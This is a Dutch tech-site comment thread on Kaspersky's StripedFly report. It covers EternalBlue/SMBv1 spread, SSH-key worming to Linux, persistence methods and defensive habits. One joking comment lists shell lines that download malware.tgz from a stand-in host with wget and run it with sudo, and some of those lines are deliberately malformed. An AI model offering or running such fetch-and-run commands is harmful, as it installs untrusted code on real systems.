Wat ik altijd doe is gewoon één gebruiken als main security oplossing en dan van tijd tot tijd een keer met een andere scanner de boel nalopen. Geen enkel anti-virusproduct is 100% waterdicht, dus een ander merk heeft de gaten weer op andere plekken zitten. Voorheen gebruikte ik altijd malwarebytes voor zo'n scan omdat die goed omging met andere virusscanners op het systeem. Sommigen doen daar naar over of zien elkaar als virus.

Kan nooit kwaad; twee weten meer dan één.

[Reactie gewijzigd door mphilipp op 22 juli 2024 15:31]

Hawkysoft @Pazo • 29 oktober 2023 03:33

Je loopt altijd achter de feiten aan met welke scanner dan ook. Windows defender is deze tijd goed genoeg. Helaas blijft het een kat en muis spelletje.. Installeer iig niet andere tools als vervanging, want uiteindelijk gebruikt het allemaal dezelfde virus definities, al dan niet slechtere..

Hoe je je zelf hier tegen wapent is nogal simpel, weet waar je naar toe gaat op het internet, weet wat je download, download geen cracks etc. en als je al die dingen wel wilt doen, geen probleem, maar houdt het in een VM. En niet te vergeten, blijf je software/drivers/etc.. updaten.. veel mensen denken, maar het draait prima, waarom zou ik updaten? Nou in menig software valt nog weleens op dat er toch een gaatje in zat.. daarom..

Qalo 28 oktober 2023 13:36

Kan iemand mij uitleggen hoe deze malware schadelijk zou kunnen zijn onder Linux? En via welke weg wordt deze malware dan aangeboden?

Een bestand downloaden en erop dubbelklikken zal onder Linux niet veel uithalen. Want zo'n bestand moet eerst uitvoerbaar gemaakt worden met een handeling door de gebruiker (dus degene achter het toetsenbord), en vervolgens moet diezelfde gebruiker ook nog eens zijn wachtwoord invoeren vooraleer zo'n stukje software geïnstalleerd en actief kan worden op je systeem. Zichzelf uitvoerbaar maken is een stuk lastiger dan onder Windows. En dan benoem ik ook maar niet dat vele Linux distro's verschillende soorten uitvoerbare bestanden hebben die onder een andere distro niet werken. Ik bedoel: een .deb bestand is niet zomaar te installeren op RHEL, Fedora en zijn afgeleiden, en een .rpm bestand niet op Debian, Ubuntu en Linux Mint.

Dat gezegd hebbende: een antivirusprogramma installeren op een Linux installatie (waar Kaspersky mogelijk op uit is) is tot op heden nooit een goed idee geweest. Daar is HIER meer over te lezen (voor diegenen die deze website nog niet kennen).

Er wordt wel vaker beweerd dat er schadelijk malware voor Linux rondwaart, maar tot op heden heb ik niet gezien dat er ook effectieve malware rondwaart die ook daadwerkelijke schade aanricht. Kaspersky zal dus vele Linux gebruikers niet kunnen overhalen om hun producten te gaan gebruiken. Mij niet in ieder geval....

UPDATE: extra informatie hierover gevonden. Dit is wat het zegt:

On Linux, the malware assumes the name 'sd-pam'. It achieves persistence using systemd services, an autostarting .desktop file, or by modifying various profile and startup files, such as /etc/rc*, profile, bashrc, or inittab files.

Lijkt mij dat nog steeds interactie nodig is van de gebruiker.

[Reactie gewijzigd door Qalo op 22 juli 2024 15:31]

Mellow Jack @Qalo • 28 oktober 2023 17:11

Er zijn zat virussen op Linux. Een bestand downloaden is op Linux inderdaad minder gevaarlijk op Linux omdat je hem uitvoerbaar moet maken maar dat is maar 1 kant van het verhaal.

Een plaatje downloaden kan ervoor zorgen dat een andere applicatie getriggered zal worden. Het makkelijkste voorbeeld is bijv het maken van thumbnails (oftewel het op de achtergrond openen van het bestand). Je bestand is dan wel niet uitvoerbaar maar het programma wat het verwerkt wel. Net zoals laatst bij dat plaatjes formaat van Google kan de gebruikte bibliotheek een kwetbaarheid bevatten waarvan het gedownloade bestand gebruik van kan maken....

Hawkysoft @Mellow Jack • 29 oktober 2023 03:46

Een pdf hoef je niet executable te maken.. 1 van de tig methodieken om een linux systeem te infecteren... enige wat jij hoeft te doen is het te openen.

Munchie @Qalo • 28 oktober 2023 14:09

Het dringt Linux systemen binnen via SSH keys/credentials die zijn gevonden op de Windows systemen.
De malware begint met het binnendringen van Windows systemen via een SMBv1 exploit (EternalBlue).

The SMBv1 infection module serves as the primary penetration tool for Windows victims, using a custom EternalBlue exploit. Upon initial execution, it immediately disables the SMBv1 protocol by modifying the HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters registry key on the victim’s system.
The kernel shellcode, delivered via an exploit, injects an additional shellcode into the user space. The payload is then deployed, which includes a framework with plugin-like expandable functionality along with an extremely lightweight TOR network client. Once this process is completed, the gates are permanently sealed, and the malware proceeds to disable the SMBv1 protocol on the infected system.

https://securelist.com/st...g-under-the-radar/110903/

De malware maakt via het TOR-netwerk verbinding met de Command&Control server. Na het binnendringen schakelt die het SMBv1 protocol uit.

The worming functionality attempts to propagate within the local network, relying not only on the exploit but also on the SSH protocol, using keys found on the victim’s machine.

The files ota.img and delta.img are used to update the malware, where ota.img corresponds to the Windows version and delta.img corresponds to the Linux version. Interestingly, system.img and ota.img are functionally identical, although ota.img includes supplementary metadata for integrity verification, while delta.img serves as the initial infection payload for Linux hosts compromised via SSH by the Windows version.

Op Windows systemen gaat de malware op zoek naar SSH credentials om zo Linux systemen binnen te dringen en zich verder te verspreiden.

rigrig @Qalo • 28 oktober 2023 14:20

Staat hier uitgelegd: het is een worm, dus er is niet direct een exploit voor Linux, maar op elke geïnfecteerde computer zoekt de malware naar (o.a.) SSH credentials, en gebruikt die dan om een geschikte binary te uploaden en uit te voeren.

Hawkysoft @Qalo • 29 oktober 2023 03:42

Deze specifiek heb ik niet uitgezocht, maar kan je genoeg methodieken vertellen... Het punt is op het moment dat jij iets opent, iets in usermode draait (tenzij je onder root runt) maar alsnog zijn er tig methodes om dmv privilege escalation toch root te bemachtigen vanuit usermode.. Natuurlijk worden dit soort dingen gefixt, maar er blijven ook genoeg nieuwe methodes oppoppen. Mocht je toch iets van een virusscanner willen gebruiken.. clamav is opensource en opzich niet zo slecht..

Dudwich 28 oktober 2023 13:21

Ik lees dus dat dit via de EternalBlue SMBv1.0 exploit gaat die gepatched is in 2017? Of lees ik het verkeerd? Ik heb daarbij wel wat vraagtekens... Wie of welke toepassingen zouden nu nog hedendaags SMB 1.0 gebruiken? En waarom zou je überhaupt SMB poorten exposen?

[Reactie gewijzigd door Dudwich op 22 juli 2024 15:31]

Bor Coördinator Frontpage Admins / FP Powermod

Kaspersky Lab
Beveiliging en antivirus
Malware

@Dudwich • 28 oktober 2023 14:18

Uit de bron:

Despite the public disclosure of the EternalBlue vulnerability in 2017, and Microsoft's subsequent release of a patch (designated as MS17-010), the threat it presents remains significant due to many users not having updated their systems.

Denk dus aan outdated OS versies, niet gepatchte systemen etc. Dit hoeft ook niet de enige initial attack vector te zijn. Sterker nog, ik denk dat dat niet zo is, en als het wel zo is zal dat waarschijnlijk nu snel worden aangepast.

P-e-t-j-e @Bor • 28 oktober 2023 17:11

Daarbij als voorbeelden: prive -> een oudere nas (sommige gebruikers vervangen deze pas wanneer hij stuk is) en zakelijk -> machines met een stukje controllersoftware die logs en/of backups op een (eigen of remote) share zet, waarbij er geen updates/patches etc worden uitgebracht maar wel de logging van bewaard/mee in de backup moet worden genomen

justme256 @P-e-t-j-e • 28 oktober 2023 19:43

Denk ook aan CNC banken. Veel nieuwere gebruiken Windows onder de controller software, maar OS patches worden niet gedaan omdat de machine aansturing dan niet meer werkt. Die banken worden vaak tientallen jaren gebruikt (je praat over machines die rustig tonnen tot miljoenen kosten) en sommigen draaien zelfs nog op Windows XP. We zijn bij mij op het werk bezig met een project om alle CNC banken in een apart VLAN te zetten, achter een firewall. had eigenlijk jaren geleden al moeten gebeuren, maar zonder budget (we hadden ook nieuwe switches nodig om het echt goed te doen) wordt het lastig.

Janbraam @Dudwich • 28 oktober 2023 15:16

Een (zeer waarschijnlijk niet volledige) lijst, opgesteld door Microsoft:
https://techcommunity.mic...clearinghouse/ba-p/426008

Oh en véél printer-copier-scanners voor thuisgebruik, tenzij je 'm via USB gebruikt.

Aapmansz @Dudwich • 28 oktober 2023 19:59

Heb SMBv1.0 helaas nodig op een aantal clients. Zijn deze ook kwetsbaar als alleen de client ondersteuning aan staat?

L0g0ff

@Dudwich • 28 oktober 2023 21:06

Als je eenmaal binnen bent in een LAN is alles 1 groot smb feest zeker als de interne firewall rules niet in orde zijn.

Maar idd vaak wel smb 2 of 3 dan. Al moet je vanaf < 2016 smb 1 volgens mij wel expliciet blokkeren via regedit/GPO anders kun je die nog aanroepen vanuit legacy en dan dus ook (theoretisch) uitbuiten.

Marctraider @Dudwich • 29 oktober 2023 08:57

Iedereen hier exposed waarschijnlijk zijn of haar poorten, iig naar hun eigen LAN toe. (Inbound open) doordat hun firewall niet goed is geconfigureerd

(En natuurlijk default alles outbound doorlaten, lekker voor 99% van de malware)

Zelf maak ik gebruik van extra firewall hardening. Mijn router weigert pakketjes te routeren die geen (of verkeerde) DSCP marks heeft.

Dus elke applicatie die ik doorlaat via mijn firewall krijgt dus ook een specifieke DSCP tag. (Zonder deze tag geen communicatie naar buiten)

Ja kan op mijn netwerk bv. een windows install doen, maar je hoeft dus geen stekkers er uit te trekken want er is geen verbinding.

Deze manier van security hardening maakt zo'n beetje 99% van malicious software onschadelijk.

[Reactie gewijzigd door Marctraider op 22 juli 2024 15:31]

themadone 28 oktober 2023 13:04

Als ik het goed lees verspreid dit via smbv1? Ik mag toch hopen dat iedereen dat inmiddels op slot heeft na die Noord Koreaanse wannacry wave van een paar jaar geleden.

wildhagen

Malware
Beveiliging en antivirus
Networking en security

@themadone • 28 oktober 2023 14:43

Ik denk dat er nog best wel de nodige servers en oudere werkstations zijn waar SMBv1 gewoon enabled is nog. Vroeger was dat immers de default. In Windows 10 stond het bijvoorbeeld ook default aan van origine, pas bij de Fall Creators Update (1709) werd SMBv1 default uitgezet.

Maar Windows Servers tot en met 2012R2, en Windows XP, 7, 8.x en 10 vóór 1709 hebben het dus allemaal by default aan staan.

Een serieuze beheerder zet dit uiteraard wel uit, maar je zal ze de kost moeten geven die dat niet doen. En dan hebben we het nog niet eens over gewone thuisgebruikers, die niet eens weten wat SMBv1 is, laat staan hoe het uit te zetten is....

Muncher 28 oktober 2023 13:26

Ik begrijp het screenshot aan het einde van het artikel niet goed. Daar lijkt niets vreemds aan de hand te zijn?

Aikon @Muncher • 28 oktober 2023 13:32

Dat was ook nog in 2015, toen was alles nog vredig

Maar groene tekst op zwarte achtergrond staat gelijk aan hackerszz he, ook bij Tweakers blijkbaar

Soldaatje @Muncher • 28 oktober 2023 13:52

Het ziet er wel eng uit, omdat het bijna Halloween is. 🎃

Pjotr 28 oktober 2023 12:36

Nog wat extra info, o.a. over de custom TOR.

https://www.zetter-zeroda...d-stripedfly-spy-platform

MISTERAMD 28 oktober 2023 14:26

StripedFly zou modulair zijn en kan verbinding maken met een externe server om nieuwe modules te downloaden die deze nieuwe toepassingen mogelijk maken.

Dat beloofd als er ooit een AI malware word gemaakt of gelanceerd op het internet. Hopelijk zijn we hier tegen bestand, tenzij het een AI malware versus AI antivirus/antimalware battle word...
Wie zal het zeggen?

OruBLMsFrl @MISTERAMD • 29 oktober 2023 01:10

Steeds meer virusscanners kijken naar gedrag ipv de static code. Als een AI dan besluit om een tijd stil te blijven in reactie daarop, veel later pas bepaalde security gevoelige, a-typische acties uit te voeren, wordt die op dat moment gepakt. Met andere woorden, de manier van werken van antivirus verschuift nu al, en is zich al aan het voorbereiden op nog veel sneller muterende virussen die AI/ML achtige eigenschappen zullen krijgen.

kabelmannetje 30 oktober 2023 04:41

Handleiding hoe deze malware te starten op Linux;

$ wget www.malwaresite.com/downloads/malware.tgz
$ tgz zfx download/malware.tgz
$ sudo sudo systemctl malwaredaemon
$ sudo +X downloads/malware
$ sudo ./malware

Veel plezier!

nout77 @kabelmannetje • 30 oktober 2023 13:16

Je vergeet daarbij even de gebruikers die op een malafide linkje vanuit een ontvangen email klikken en een zip downloaden. Of de zip vanuit de bijlage openen en uitpakken. Het uitgepakt bestand dubbelklikken en het wordt direct uitgevoerd!
Bleek een uitvoerbaar bestand te zijn.. User access op het systeem. Kernel patches niet up to date? Privilege escalation zorgt direct voor root toegang op het gehele systeem.

Ruim 90% van de initiële infecties gebeurt vanuit een ontvangen email bericht.

PjotterP 28 oktober 2023 12:57

Hmm, ik ben een Windows gebruiker maar ga toch maar eens naar FreeBSD of OpenBSD kijken..

xFeverr @PjotterP • 28 oktober 2023 15:10

Voor dit? Ik denk dat je na 2017 wel een keer je systeem hebt geüpdatet toch? Dan heb je hier niets voor te vrezen in ieder geval.

novasurp @PjotterP • 28 oktober 2023 20:08

Zou ik absoluut doen, maar hou er wel rekening mee dat Linux en BSD niet iets zoals Microsoft SmartScreen of Apple Gatekeeper hebben, dus je moet extra opletten wat voor bestanden je opent.

[Reactie gewijzigd door novasurp op 22 juli 2024 15:31]

RobertPeterson 28 oktober 2023 16:29

StripedFly probeert om twee uur talloze gegevens over de gebruiker te verzamelen zoals bijvoorbeeld diens inloggegevens, wachtwoorden, adres, werkgever en functietitel.

Probeert stripedfly om de 2 uur of om 2 uur smiddags oid dit te doen?

wildhagen

Malware
Beveiliging en antivirus
Networking en security

@RobertPeterson • 28 oktober 2023 16:31

Staat gewoon letterlijk in het bronartikel dat hij het om de 2 uur probeert:

The attacker behind this operation has acquired extensive capabilities to clandestinely spy on victims. The malware harvests credentials every two hours, pilfering sensitive data such as website and WIFI login credentials, along with personal data such as name, address, phone number, company, and job title. Furthermore, the malware can capture screenshots on the victim's device without detection, gain significant control over the machine, and even record microphone input.

RobertPeterson @wildhagen • 28 oktober 2023 16:33

Het was dan ook een retorische vraag om tweakers op een typfout te wijzen

Op dit item kan niet meer gereageerd worden.

Onderzoekers Kaspersky waarschuwen voor geavanceerde Linux- en Windows-malware

Lees meer

Reacties (118)

Sorteer op:

Weergave: